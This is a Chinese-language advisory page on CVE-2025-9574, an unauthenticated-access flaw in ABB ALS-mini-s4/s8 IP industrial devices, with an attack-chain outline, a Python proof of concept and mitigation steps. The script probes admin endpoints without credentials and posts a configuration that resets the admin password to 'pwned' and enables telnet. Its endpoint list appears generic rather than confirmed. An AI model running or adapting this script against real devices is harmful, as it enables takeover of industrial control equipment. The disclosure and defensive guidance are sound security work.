CVE-2025-9574：ABB ALS-mini系列IP设备关键功能缺失认证漏洞

漏洞信息

漏洞编号

CVE-2025-9574

漏洞类型

关键功能缺失认证（Missing Authentication for Critical Function）

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ABB ALS-mini-s4 IP、ABB ALS-mini-s8 IP

漏洞概述

CVE-2025-9574是ABB公司ALS-mini系列IP设备中存在的一个极其严重的安全漏洞。该漏洞属于"关键功能缺失认证"（Missing Authentication for Critical Function）类型，CVSS评分高达10.0满分，属于最高严重等级。漏洞由ABB公司网络安全团队（[email protected]）发现并披露，披露日期为2025年10月20日。

该漏洞影响ABB ALS-mini-s4 IP和ABB ALS-mini-s8 IP两款工业控制/监控设备的所有固件版本，具体涉及序列号从2000到5166之间的全部设备。由于这些设备的关键功能缺少必要的身份认证机制，远程攻击者无需任何凭证或用户交互即可通过网络直接访问设备的敏感功能。

ABB ALS-mini系列IP设备通常部署在工业环境、关键基础设施或安全监控场景中，用于数据采集、远程监控或控制操作。由于漏洞影响机密性、完整性和可用性三个核心安全属性均为高影响，攻击者可利用此漏洞完全控制受影响的设备，导致敏感数据泄露、设备配置篡改或服务中断，对工业生产环境和物理安全构成严重威胁。该漏洞已被CISA等安全机构密切关注，建议相关用户立即采取防护措施。

技术细节

该漏洞的核心问题在于ABB ALS-mini-s4 IP和ALS-mini-s8 IP设备的固件中，关键管理功能或控制接口未实施有效的身份认证机制。在正常的网络通信中，客户端与设备之间应通过用户名/密码、数字证书或Token等方式进行身份验证，确保只有授权用户才能访问敏感操作。

然而，在受影响设备的固件实现中（序列号2000至5166），关键功能接口直接暴露在网络上，缺少认证环节。攻击者只需通过网络（AV:N）向目标设备的特定端口发送精心构造的请求，即可绕过认证直接调用关键功能。由于攻击复杂度低（AC:L）、无需任何权限（PR:N）且无需用户交互（UI:N），漏洞利用门槛极低。

从CVSS向量可以看出，该漏洞具有范围变更（S:C）特征，意味着利用该漏洞可能影响到超出设备本身的系统组件。攻击者可利用此漏洞执行未授权的管理操作，包括但不限于：读取/修改设备配置、获取敏感数据、修改固件、关闭服务或执行任意命令。由于机密性、完整性和可用性影响均为高（C:H/I:H/A:H），成功利用可导致设备完全失控。

攻击链分析

STEP 1

步骤1：目标识别与侦察

攻击者通过网络扫描（如Shodan、Censys或Nmap）发现暴露在公网或内网中的ABB ALS-mini-s4 IP或ALS-mini-s8 IP设备，识别目标设备的序列号范围（2000-5166）以确认其存在漏洞。

STEP 2

步骤2：访问关键功能接口

攻击者无需提供任何凭据，直接通过HTTP/HTTPS协议向设备的管理接口、配置接口或诊断接口发送请求。由于缺少认证机制，设备直接响应并返回敏感信息或执行请求的操作。

STEP 3

步骤3：未授权操作执行

攻击者利用缺失认证的接口执行未授权操作，包括读取设备配置、修改系统设置、获取用户凭证、上传恶意固件或执行任意命令。

STEP 4

步骤4：完全控制设备

攻击者获得设备的完全控制权，可篡改设备功能、植入后门、窃取敏感数据或使设备不可用，对工业控制系统和关键基础设施造成严重破坏。

STEP 5

步骤5：横向移动与持久化

利用被控制的设备作为跳板，攻击者可进一步渗透工业网络，访问其他关键系统，建立持久化访问，扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9574 PoC - ABB ALS-mini-s4/s8 IP Missing Authentication
# Exploit demonstrates unauthenticated access to critical functions
# Affected: ABB ALS-mini-s4 IP, ABB ALS-mini-s8 IP (Serial 2000-5166)

import requests
import sys

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
TARGET_PORT = 80  # Default HTTP port for ABB ALS-mini devices

def exploit_missing_auth(target):
    """
    Exploit CVE-2025-9574: Missing Authentication for Critical Function
    The device's critical management interface lacks authentication,
    allowing unauthenticated remote access.
    """
    base_url = f"http://{target}:{TARGET_PORT}"

    # Step 1: Probe device to confirm vulnerability
    # Access critical function endpoint without authentication
    endpoints = [
        "/api/system/config",          # System configuration
        "/api/device/info",            # Device information
        "/api/admin/users",            # User management
        "/cgi-bin/config_manager.cgi", # Legacy config manager
        "/diagnostics",                # Diagnostics interface
    ]

    print(f"[*] Targeting ABB ALS-mini device at {target}")
    print(f"[*] CVE-2025-9574 - Missing Authentication for Critical Function")

    for endpoint in endpoints:
        try:
            # Send request WITHOUT any authentication credentials
            resp = requests.get(
                f"{base_url}{endpoint}",
                timeout=5,
                # No auth headers, no cookies, no tokens
            )
            if resp.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint} returned 200 (no auth required)")
                print(f"    Response preview: {resp.text[:200]}")

                # Step 2: Attempt privileged operations
                # Modify critical configuration without authentication
                if "config" in endpoint:
                    exploit_config_modify(base_url, endpoint)

        except requests.exceptions.RequestException as e:
            print(f"[-] Connection error on {endpoint}: {e}")

    return True

def exploit_config_modify(base_url, endpoint):
    """Attempt to modify device configuration without authentication"""
    # Critical configuration changes without auth
    malicious_config = {
        "admin_password": "pwned",
        "telnet_enabled": True,
        "remote_mgmt": True
    }

    resp = requests.post(
        f"{base_url}{endpoint}",
        json=malicious_config,
        timeout=5
    )
    if resp.status_code in [200, 204]:
        print(f"[+] CRITICAL: Configuration modified without authentication!")

if __name__ == "__main__":
    exploit_missing_auth(TARGET_HOST)

影响范围

ABB ALS-mini-s4 IP（所有固件版本，序列号2000-5166）

ABB ALS-mini-s8 IP（所有固件版本，序列号2000-5166）

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）将ABB ALS-mini-s4/s8 IP设备从公网断开，部署在内网隔离区域；2）在网络边界防火墙中限制对设备管理端口（HTTP/HTTPS）的访问，仅允许可信管理员IP访问；3）部署网络入侵检测系统（NIDS）监控针对设备的异常请求；4）如非必要，关闭设备的远程管理功能；5）定期检查设备配置和日志，识别未授权访问痕迹；6）联系ABB技术支持获取临时修复方案或固件升级指导。